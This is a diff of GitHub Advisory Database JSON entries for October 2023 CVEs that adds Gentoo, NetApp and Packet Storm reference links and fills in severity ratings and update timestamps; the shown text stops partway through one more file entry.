100644 --- a/advisories/unreviewed/2023/10/GHSA-4vx7-4j56-j894/GHSA-4vx7-4j56-j894.json +++ b/advisories/unreviewed/2023/10/GHSA-4vx7-4j56-j894/GHSA-4vx7-4j56-j894.json @@ -40,6 +40,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RA6HMWNOYQ56R35MHW77GVW7373Z4RSN/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-5fgm-x6g8-c36j/GHSA-5fgm-x6g8-c36j.json b/advisories/unreviewed/2023/10/GHSA-5fgm-x6g8-c36j/GHSA-5fgm-x6g8-c36j.json index 92805716e2d5f..b5365f2ce3c9c 100644 --- a/advisories/unreviewed/2023/10/GHSA-5fgm-x6g8-c36j/GHSA-5fgm-x6g8-c36j.json +++ b/advisories/unreviewed/2023/10/GHSA-5fgm-x6g8-c36j/GHSA-5fgm-x6g8-c36j.json @@ -45,6 +45,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-63pw-wc3v-c9g9/GHSA-63pw-wc3v-c9g9.json b/advisories/unreviewed/2023/10/GHSA-63pw-wc3v-c9g9/GHSA-63pw-wc3v-c9g9.json index 44d613ca79a35..41be70673c3e3 100644 --- a/advisories/unreviewed/2023/10/GHSA-63pw-wc3v-c9g9/GHSA-63pw-wc3v-c9g9.json +++ b/advisories/unreviewed/2023/10/GHSA-63pw-wc3v-c9g9/GHSA-63pw-wc3v-c9g9.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-7245-jcxv-7q52/GHSA-7245-jcxv-7q52.json b/advisories/unreviewed/2023/10/GHSA-7245-jcxv-7q52/GHSA-7245-jcxv-7q52.json index 0a7ed62e52d37..35df62d7458da 100644 --- a/advisories/unreviewed/2023/10/GHSA-7245-jcxv-7q52/GHSA-7245-jcxv-7q52.json +++ b/advisories/unreviewed/2023/10/GHSA-7245-jcxv-7q52/GHSA-7245-jcxv-7q52.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7245-jcxv-7q52", - "modified": "2023-10-06T18:30:32Z", + "modified": "2024-01-31T15:30:18Z", "published": "2023-10-06T18:30:32Z", "aliases": [ "CVE-2023-39928" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EEMDC5TQAANFH5D77QM34ZTUKXPFGVL/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1831" @@ -42,7 +46,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-06T16:15:13Z" diff --git a/advisories/unreviewed/2023/10/GHSA-74q5-gg24-8jcf/GHSA-74q5-gg24-8jcf.json b/advisories/unreviewed/2023/10/GHSA-74q5-gg24-8jcf/GHSA-74q5-gg24-8jcf.json index 0eadba697e194..048e669f931c2 100644 --- a/advisories/unreviewed/2023/10/GHSA-74q5-gg24-8jcf/GHSA-74q5-gg24-8jcf.json +++ b/advisories/unreviewed/2023/10/GHSA-74q5-gg24-8jcf/GHSA-74q5-gg24-8jcf.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-7xw9-w465-6x42/GHSA-7xw9-w465-6x42.json b/advisories/unreviewed/2023/10/GHSA-7xw9-w465-6x42/GHSA-7xw9-w465-6x42.json index 211059ca7b237..9e08ac4b62aae 100644 --- a/advisories/unreviewed/2023/10/GHSA-7xw9-w465-6x42/GHSA-7xw9-w465-6x42.json +++ b/advisories/unreviewed/2023/10/GHSA-7xw9-w465-6x42/GHSA-7xw9-w465-6x42.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231027-0009/" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0005/" + }, { "type": "WEB", "url": "https://support.apple.com/kb/HT214036" diff --git a/advisories/unreviewed/2023/10/GHSA-962v-m5vf-4cv6/GHSA-962v-m5vf-4cv6.json b/advisories/unreviewed/2023/10/GHSA-962v-m5vf-4cv6/GHSA-962v-m5vf-4cv6.json index da2f0857872a4..29db411563a50 100644 --- a/advisories/unreviewed/2023/10/GHSA-962v-m5vf-4cv6/GHSA-962v-m5vf-4cv6.json +++ b/advisories/unreviewed/2023/10/GHSA-962v-m5vf-4cv6/GHSA-962v-m5vf-4cv6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-962v-m5vf-4cv6", - "modified": "2023-10-25T18:32:22Z", + "modified": "2024-02-01T15:30:24Z", "published": "2023-10-25T18:32:22Z", "aliases": [ "CVE-2023-39219" @@ -34,7 +34,7 @@ "cwe_ids": [ "CWE-400" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-25T18:17:28Z" diff --git a/advisories/unreviewed/2023/10/GHSA-9855-248g-3cv8/GHSA-9855-248g-3cv8.json b/advisories/unreviewed/2023/10/GHSA-9855-248g-3cv8/GHSA-9855-248g-3cv8.json index f72480a7335b2..dc43e5c53d34e 100644 --- a/advisories/unreviewed/2023/10/GHSA-9855-248g-3cv8/GHSA-9855-248g-3cv8.json +++ b/advisories/unreviewed/2023/10/GHSA-9855-248g-3cv8/GHSA-9855-248g-3cv8.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-9pf8-85g4-h267/GHSA-9pf8-85g4-h267.json b/advisories/unreviewed/2023/10/GHSA-9pf8-85g4-h267/GHSA-9pf8-85g4-h267.json index 03e6415e0ef16..35a4eb4e453eb 100644 --- a/advisories/unreviewed/2023/10/GHSA-9pf8-85g4-h267/GHSA-9pf8-85g4-h267.json +++ b/advisories/unreviewed/2023/10/GHSA-9pf8-85g4-h267/GHSA-9pf8-85g4-h267.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-ch24-2427-xcwg/GHSA-ch24-2427-xcwg.json b/advisories/unreviewed/2023/10/GHSA-ch24-2427-xcwg/GHSA-ch24-2427-xcwg.json index c5f0067799673..cd9641293cb50 100644 --- a/advisories/unreviewed/2023/10/GHSA-ch24-2427-xcwg/GHSA-ch24-2427-xcwg.json +++ b/advisories/unreviewed/2023/10/GHSA-ch24-2427-xcwg/GHSA-ch24-2427-xcwg.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-ch8m-5863-fcr7/GHSA-ch8m-5863-fcr7.json b/advisories/unreviewed/2023/10/GHSA-ch8m-5863-fcr7/GHSA-ch8m-5863-fcr7.json index 2971184a25c69..fd7492e95d737 100644 --- a/advisories/unreviewed/2023/10/GHSA-ch8m-5863-fcr7/GHSA-ch8m-5863-fcr7.json +++ b/advisories/unreviewed/2023/10/GHSA-ch8m-5863-fcr7/GHSA-ch8m-5863-fcr7.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTCZGQPRDAOPP6NK4CIDJKIPMBWD5J7K/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213981" diff --git a/advisories/unreviewed/2023/10/GHSA-cvp3-7vpw-ffh6/GHSA-cvp3-7vpw-ffh6.json b/advisories/unreviewed/2023/10/GHSA-cvp3-7vpw-ffh6/GHSA-cvp3-7vpw-ffh6.json index 33c7a405772e4..36db532321d3d 100644 --- a/advisories/unreviewed/2023/10/GHSA-cvp3-7vpw-ffh6/GHSA-cvp3-7vpw-ffh6.json +++ b/advisories/unreviewed/2023/10/GHSA-cvp3-7vpw-ffh6/GHSA-cvp3-7vpw-ffh6.json @@ -45,6 +45,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-f483-q24h-3j43/GHSA-f483-q24h-3j43.json b/advisories/unreviewed/2023/10/GHSA-f483-q24h-3j43/GHSA-f483-q24h-3j43.json index e61ea0fcc6e89..b3da93a74e68e 100644 --- a/advisories/unreviewed/2023/10/GHSA-f483-q24h-3j43/GHSA-f483-q24h-3j43.json +++ b/advisories/unreviewed/2023/10/GHSA-f483-q24h-3j43/GHSA-f483-q24h-3j43.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-fjv7-prxm-hm8g/GHSA-fjv7-prxm-hm8g.json b/advisories/unreviewed/2023/10/GHSA-fjv7-prxm-hm8g/GHSA-fjv7-prxm-hm8g.json index 06998b280e858..f93a62211b51f 100644 --- a/advisories/unreviewed/2023/10/GHSA-fjv7-prxm-hm8g/GHSA-fjv7-prxm-hm8g.json +++ b/advisories/unreviewed/2023/10/GHSA-fjv7-prxm-hm8g/GHSA-fjv7-prxm-hm8g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fjv7-prxm-hm8g", - "modified": "2023-10-16T18:30:27Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-11T12:30:27Z", "aliases": [ "CVE-2023-44109" @@ -34,7 +34,7 @@ "cwe_ids": [ "CWE-74" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-11T11:15:14Z" diff --git a/advisories/unreviewed/2023/10/GHSA-g488-m495-9mgj/GHSA-g488-m495-9mgj.json b/advisories/unreviewed/2023/10/GHSA-g488-m495-9mgj/GHSA-g488-m495-9mgj.json index afe42f1f11c63..5684a9e3bf721 100644 --- a/advisories/unreviewed/2023/10/GHSA-g488-m495-9mgj/GHSA-g488-m495-9mgj.json +++ b/advisories/unreviewed/2023/10/GHSA-g488-m495-9mgj/GHSA-g488-m495-9mgj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g488-m495-9mgj", - "modified": "2023-10-03T03:31:24Z", + "modified": "2024-02-08T18:30:38Z", "published": "2023-10-03T03:31:24Z", "aliases": [ "CVE-2023-5345" @@ -40,13 +40,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5PDNWPKAP3WL5RQZ4RIDS6MG32OHH5R/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "database_specific": { "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-03T03:15:09Z" diff --git a/advisories/unreviewed/2023/10/GHSA-ggqw-5347-f844/GHSA-ggqw-5347-f844.json b/advisories/unreviewed/2023/10/GHSA-ggqw-5347-f844/GHSA-ggqw-5347-f844.json index 283f6119acbb8..32234f6161194 100644 --- a/advisories/unreviewed/2023/10/GHSA-ggqw-5347-f844/GHSA-ggqw-5347-f844.json +++ b/advisories/unreviewed/2023/10/GHSA-ggqw-5347-f844/GHSA-ggqw-5347-f844.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-hvph-2g5j-p2c9/GHSA-hvph-2g5j-p2c9.json b/advisories/unreviewed/2023/10/GHSA-hvph-2g5j-p2c9/GHSA-hvph-2g5j-p2c9.json index 5e82a3cf1b4cd..74856c836a149 100644 --- a/advisories/unreviewed/2023/10/GHSA-hvph-2g5j-p2c9/GHSA-hvph-2g5j-p2c9.json +++ b/advisories/unreviewed/2023/10/GHSA-hvph-2g5j-p2c9/GHSA-hvph-2g5j-p2c9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hvph-2g5j-p2c9", - "modified": "2023-10-10T06:30:30Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-10T06:30:29Z", "aliases": [ "CVE-2023-5467" @@ -38,7 +38,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-10T05:15:09Z" diff --git a/advisories/unreviewed/2023/10/GHSA-j6jf-4ffc-g9xf/GHSA-j6jf-4ffc-g9xf.json b/advisories/unreviewed/2023/10/GHSA-j6jf-4ffc-g9xf/GHSA-j6jf-4ffc-g9xf.json index 6f530930b2c22..4a14d9e967c5a 100644 --- a/advisories/unreviewed/2023/10/GHSA-j6jf-4ffc-g9xf/GHSA-j6jf-4ffc-g9xf.json +++ b/advisories/unreviewed/2023/10/GHSA-j6jf-4ffc-g9xf/GHSA-j6jf-4ffc-g9xf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j6jf-4ffc-g9xf", - "modified": "2023-10-31T15:30:20Z", + "modified": "2024-02-05T18:31:36Z", "published": "2023-10-25T18:32:21Z", "aliases": [ "CVE-2023-36085" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176991/SISQUAL-WFM-7.1.319.103-Host-Header-Injection.html" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-25T18:17:28Z" diff --git a/advisories/unreviewed/2023/10/GHSA-j7xf-pgw2-75mr/GHSA-j7xf-pgw2-75mr.json b/advisories/unreviewed/2023/10/GHSA-j7xf-pgw2-75mr/GHSA-j7xf-pgw2-75mr.json index 0cc40986fafe3..83e8228ceca06 100644 --- a/advisories/unreviewed/2023/10/GHSA-j7xf-pgw2-75mr/GHSA-j7xf-pgw2-75mr.json +++ b/advisories/unreviewed/2023/10/GHSA-j7xf-pgw2-75mr/GHSA-j7xf-pgw2-75mr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j7xf-pgw2-75mr", - "modified": "2023-10-04T18:30:32Z", + "modified": "2024-02-04T12:30:28Z", "published": "2023-10-04T18:30:32Z", "aliases": [ "CVE-2023-5371" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://gitlab.com/wireshark/wireshark/-/issues/19322" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-09" + }, { "type": "WEB", "url": "https://www.wireshark.org/security/wnpa-sec-2023-27.html" @@ -35,7 +39,7 @@ "CWE-770", "CWE-789" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-04T17:15:10Z" diff --git a/advisories/unreviewed/2023/10/GHSA-jj6p-fg3r-6vr7/GHSA-jj6p-fg3r-6vr7.json b/advisories/unreviewed/2023/10/GHSA-jj6p-fg3r-6vr7/GHSA-jj6p-fg3r-6vr7.json index 41349821e4e8c..683cdf9f3f5ac 100644 --- a/advisories/unreviewed/2023/10/GHSA-jj6p-fg3r-6vr7/GHSA-jj6p-fg3r-6vr7.json +++ b/advisories/unreviewed/2023/10/GHSA-jj6p-fg3r-6vr7/GHSA-jj6p-fg3r-6vr7.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-jmh8-4h3g-x5g5/GHSA-jmh8-4h3g-x5g5.json b/advisories/unreviewed/2023/10/GHSA-jmh8-4h3g-x5g5/GHSA-jmh8-4h3g-x5g5.json index 8c08479dcfcb0..286762e6a526e 100644 --- a/advisories/unreviewed/2023/10/GHSA-jmh8-4h3g-x5g5/GHSA-jmh8-4h3g-x5g5.json +++ b/advisories/unreviewed/2023/10/GHSA-jmh8-4h3g-x5g5/GHSA-jmh8-4h3g-x5g5.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTCZGQPRDAOPP6NK4CIDJKIPMBWD5J7K/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213981" diff --git a/advisories/unreviewed/2023/10/GHSA-jr8w-j9v9-c93x/GHSA-jr8w-j9v9-c93x.json b/advisories/unreviewed/2023/10/GHSA-jr8w-j9v9-c93x/GHSA-jr8w-j9v9-c93x.json index b6b175286e3d7..05afd79688baf 100644 --- a/advisories/unreviewed/2023/10/GHSA-jr8w-j9v9-c93x/GHSA-jr8w-j9v9-c93x.json +++ b/advisories/unreviewed/2023/10/GHSA-jr8w-j9v9-c93x/GHSA-jr8w-j9v9-c93x.json @@ -45,6 +45,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-jrmp-538j-7h55/GHSA-jrmp-538j-7h55.json b/advisories/unreviewed/2023/10/GHSA-jrmp-538j-7h55/GHSA-jrmp-538j-7h55.json index 444baa3d2df01..8b1df42134e96 100644 --- a/advisories/unreviewed/2023/10/GHSA-jrmp-538j-7h55/GHSA-jrmp-538j-7h55.json +++ b/advisories/unreviewed/2023/10/GHSA-jrmp-538j-7h55/GHSA-jrmp-538j-7h55.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-jvxf-w5f4-25gh/GHSA-jvxf-w5f4-25gh.json b/advisories/unreviewed/2023/10/GHSA-jvxf-w5f4-25gh/GHSA-jvxf-w5f4-25gh.json index 305303e719f11..67667ef5daaa2 100644 --- a/advisories/unreviewed/2023/10/GHSA-jvxf-w5f4-25gh/GHSA-jvxf-w5f4-25gh.json +++ b/advisories/unreviewed/2023/10/GHSA-jvxf-w5f4-25gh/GHSA-jvxf-w5f4-25gh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jvxf-w5f4-25gh", - "modified": "2023-10-18T00:31:41Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-18T00:31:41Z", "aliases": [ "CVE-2023-22074" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2023.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/175352/Oracle-19c-21c-Sharding-Component-Password-Hash-Exposure.html" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-17T22:15:13Z" diff --git a/advisories/unreviewed/2023/10/GHSA-m58q-xcxc-4q6h/GHSA-m58q-xcxc-4q6h.json b/advisories/unreviewed/2023/10/GHSA-m58q-xcxc-4q6h/GHSA-m58q-xcxc-4q6h.json index 5715bc994fa05..52389eace8e2c 100644 --- a/advisories/unreviewed/2023/10/GHSA-m58q-xcxc-4q6h/GHSA-m58q-xcxc-4q6h.json +++ b/advisories/unreviewed/2023/10/GHSA-m58q-xcxc-4q6h/GHSA-m58q-xcxc-4q6h.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32359" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213981" diff --git a/advisories/unreviewed/2023/10/GHSA-phrf-fj83-fcfv/GHSA-phrf-fj83-fcfv.json b/advisories/unreviewed/2023/10/GHSA-phrf-fj83-fcfv/GHSA-phrf-fj83-fcfv.json index 8f4d495356723..ca581dd815b70 100644 --- a/advisories/unreviewed/2023/10/GHSA-phrf-fj83-fcfv/GHSA-phrf-fj83-fcfv.json +++ b/advisories/unreviewed/2023/10/GHSA-phrf-fj83-fcfv/GHSA-phrf-fj83-fcfv.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35794" }, + { + "type": "WEB", + "url": "https://blog.kscsc.online/cves/202335794/md.html" + }, { "type": "WEB", "url": "https://github.com/Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking" diff --git a/advisories/unreviewed/2023/10/GHSA-pj5c-qr29-6746/GHSA-pj5c-qr29-6746.json b/advisories/unreviewed/2023/10/GHSA-pj5c-qr29-6746/GHSA-pj5c-qr29-6746.json index c303a4735886e..51ae6dc73a8d6 100644 --- a/advisories/unreviewed/2023/10/GHSA-pj5c-qr29-6746/GHSA-pj5c-qr29-6746.json +++ b/advisories/unreviewed/2023/10/GHSA-pj5c-qr29-6746/GHSA-pj5c-qr29-6746.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-pq6p-fc96-wc5w/GHSA-pq6p-fc96-wc5w.json b/advisories/unreviewed/2023/10/GHSA-pq6p-fc96-wc5w/GHSA-pq6p-fc96-wc5w.json index 862222ab7df42..f54bab29ed118 100644 --- a/advisories/unreviewed/2023/10/GHSA-pq6p-fc96-wc5w/GHSA-pq6p-fc96-wc5w.json +++ b/advisories/unreviewed/2023/10/GHSA-pq6p-fc96-wc5w/GHSA-pq6p-fc96-wc5w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pq6p-fc96-wc5w", - "modified": "2023-11-16T03:30:19Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-26T21:30:22Z", "aliases": [ "CVE-2023-46747" @@ -36,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-288" + "CWE-288", + "CWE-306" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2023/10/GHSA-q38f-wwqq-rr3v/GHSA-q38f-wwqq-rr3v.json b/advisories/unreviewed/2023/10/GHSA-q38f-wwqq-rr3v/GHSA-q38f-wwqq-rr3v.json index 3f2f071d6ef02..5feb67cfca35a 100644 --- a/advisories/unreviewed/2023/10/GHSA-q38f-wwqq-rr3v/GHSA-q38f-wwqq-rr3v.json +++ b/advisories/unreviewed/2023/10/GHSA-q38f-wwqq-rr3v/GHSA-q38f-wwqq-rr3v.json @@ -113,6 +113,10 @@ "type": "WEB", "url": "https://lists.x.org/archives/xorg-announce/2023-October/003430.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231130-0004/" diff --git a/advisories/unreviewed/2023/10/GHSA-r54v-c2hx-5x23/GHSA-r54v-c2hx-5x23.json b/advisories/unreviewed/2023/10/GHSA-r54v-c2hx-5x23/GHSA-r54v-c2hx-5x23.json index c31aeffcb72fb..02872f8045c27 100644 --- a/advisories/unreviewed/2023/10/GHSA-r54v-c2hx-5x23/GHSA-r54v-c2hx-5x23.json +++ b/advisories/unreviewed/2023/10/GHSA-r54v-c2hx-5x23/GHSA-r54v-c2hx-5x23.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-r6m2-cj32-wg84/GHSA-r6m2-cj32-wg84.json b/advisories/unreviewed/2023/10/GHSA-r6m2-cj32-wg84/GHSA-r6m2-cj32-wg84.json index 790005b0ac842..b2c7a155696ca 100644 --- a/advisories/unreviewed/2023/10/GHSA-r6m2-cj32-wg84/GHSA-r6m2-cj32-wg84.json +++ b/advisories/unreviewed/2023/10/GHSA-r6m2-cj32-wg84/GHSA-r6m2-cj32-wg84.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r6m2-cj32-wg84", - "modified": "2023-10-13T21:30:18Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-09T09:30:42Z", "aliases": [ "CVE-2023-39854" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-918" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-09T07:15:24Z" diff --git a/advisories/unreviewed/2023/10/GHSA-vrhp-3w5m-c3w6/GHSA-vrhp-3w5m-c3w6.json b/advisories/unreviewed/2023/10/GHSA-vrhp-3w5m-c3w6/GHSA-vrhp-3w5m-c3w6.json index 63f2507f26030..a3ea5b9a2d621 100644 --- a/advisories/unreviewed/2023/10/GHSA-vrhp-3w5m-c3w6/GHSA-vrhp-3w5m-c3w6.json +++ b/advisories/unreviewed/2023/10/GHSA-vrhp-3w5m-c3w6/GHSA-vrhp-3w5m-c3w6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vrhp-3w5m-c3w6", - "modified": "2023-10-19T00:30:18Z", + "modified": "2024-02-01T18:31:06Z", "published": "2023-10-16T09:30:19Z", "aliases": [ "CVE-2023-45629" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-16T09:15:10Z" diff --git a/advisories/unreviewed/2023/10/GHSA-vw96-6w82-f9ww/GHSA-vw96-6w82-f9ww.json b/advisories/unreviewed/2023/10/GHSA-vw96-6w82-f9ww/GHSA-vw96-6w82-f9ww.json index 87f3ac910367f..0c924f6d84416 100644 --- a/advisories/unreviewed/2023/10/GHSA-vw96-6w82-f9ww/GHSA-vw96-6w82-f9ww.json +++ b/advisories/unreviewed/2023/10/GHSA-vw96-6w82-f9ww/GHSA-vw96-6w82-f9ww.json @@ -45,6 +45,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-w228-frcg-5x99/GHSA-w228-frcg-5x99.json b/advisories/unreviewed/2023/10/GHSA-w228-frcg-5x99/GHSA-w228-frcg-5x99.json index d6cb05195e3ba..874af65e1011e 100644 --- a/advisories/unreviewed/2023/10/GHSA-w228-frcg-5x99/GHSA-w228-frcg-5x99.json +++ b/advisories/unreviewed/2023/10/GHSA-w228-frcg-5x99/GHSA-w228-frcg-5x99.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w228-frcg-5x99", - "modified": "2023-10-11T09:34:01Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-04T21:30:22Z", "aliases": [ "CVE-2023-5391" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-502" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-04T19:15:10Z" diff --git a/advisories/unreviewed/2023/10/GHSA-w5h3-rmvr-mgm6/GHSA-w5h3-rmvr-mgm6.json b/advisories/unreviewed/2023/10/GHSA-w5h3-rmvr-mgm6/GHSA-w5h3-rmvr-mgm6.json index 74f102243bdb5..ca6d51d6d3bb2 100644 --- a/advisories/unreviewed/2023/10/GHSA-w5h3-rmvr-mgm6/GHSA-w5h3-rmvr-mgm6.json +++ 